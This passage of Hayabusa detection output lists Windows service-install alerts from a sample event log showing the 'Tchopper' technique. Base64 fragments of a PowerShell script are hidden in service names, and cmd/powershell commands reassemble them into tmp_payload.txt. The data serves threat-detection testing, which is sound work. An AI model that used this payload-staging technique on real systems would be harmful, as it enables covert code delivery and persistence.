Tchopper.evtx" +2021-11-03 08:20:38.020 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:38.020 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:38.020 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:39.470 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:39.470 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:39.470 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:40.933 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:40.933 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:40.933 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:42.386 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:42.386 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:42.386 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ01lc3NhZ2UgPSAkbG9nTWVzc2FnZS5TdWJzdHJpbmcoMCwyMDApICsgIi4uLiINCg0KICAgICAgICB9DQoNCiAgICAgICAgJG91dHB1dCA9ICRsb2dNZXNzYWdlICsgImBuIg0KDQogICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:43.824 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:43.824 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:43.824 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IHN3aXRjaCgkU2V2ZXJpdHkpIHsNCiAgICAgICAgDQogICAgICAgICAgICAkSU5GT19MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBHcmVlbjsgYnJlYWt9IA0KICAgICAgICAgICANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:45.277 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:45.277 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:45.277 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICRJTlBVVF9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBDeWFuOyBicmVha30NCg0KICAgICAgICAgICAgJFdBUk5fTE9HIHtXcml0ZS1Ib3N0ICRvdXRwdXQgLUZvcmUgQ3lh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:46.746 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:46.746 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:46.746 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bjsgYnJlYWt9DQoNCiAgICAgICAgICAgICRFUlJPUl9MT0cge1dyaXRlLUhvc3QgJG91dHB1dCAtRm9yZSBSZWQ7IGJyZWFrfQ0KDQogICAgICAgICAgICBEZWZhdWx0IHtXcml0ZS1Ib3N0ICJVbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:48.200 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:48.200 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:48.200 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: FibGUgdG8gbG9nIGJhc2VkIG9uIHNlcmVyaXR5OiAkU2V2ZXJpdHkiIC1Gb3JlIEN5YW47IGJyZWFrfQ0KICAgICAgICB9DQoNCiAgICB9DQoNCiAgICBjYXRjaCB7DQogICAgICAgIA0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:49.641 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:49.641 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:49.641 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICBXcml0ZS1Ib3N0ICJVbmFibGUgdG8gbG9nYG4iIC1Gb3JlIFJlZA0KDQogICAgICAgIFdyaXRlLUhvc3QgJEVycm9yWzBdIC1Gb3JlIFJlZA0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:51.086 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:51.086 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:51.086 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JbMF0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUhvc3QgIkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciIgLUZvcmUg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:52.536 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:52.536 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:52.536 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UmVkDQoNCiAgICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCiMgSW1wb3J0cyB0aGUgZm9ybXMNCltTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWRXaXRoUGFydGlhbE5hbWUoIlN5c3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:54.010 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:54.010 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:54.010 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RlbS53aW5kb3dzLmZvcm1zIikgfCBPdXQtTnVsbA0KDQojU2V0IHNldmVyaXRpZXMNCiRJTkZPX0xPRyA9ICJJbmZvIg0KJElOUFVUX0xPRyA9ICJJbnB1dCINCiRXQVJOX0xPRyA9ICJXYXJuIg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:20:55.527 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:20:55.527 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: JEVSUk9SX0xPRyA9ICJFcnJvciINCg0KI1NldCBDb21wdXRlciBMaXN0IE9wdGlvbnMNCiMkaG9zdGRvbWFpbiA9IChHZXQtQUREb21haW4pLkROU1Jvb3QNCiRGSUxFX09QVCA9ICJJUCBMaXN0Ig | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 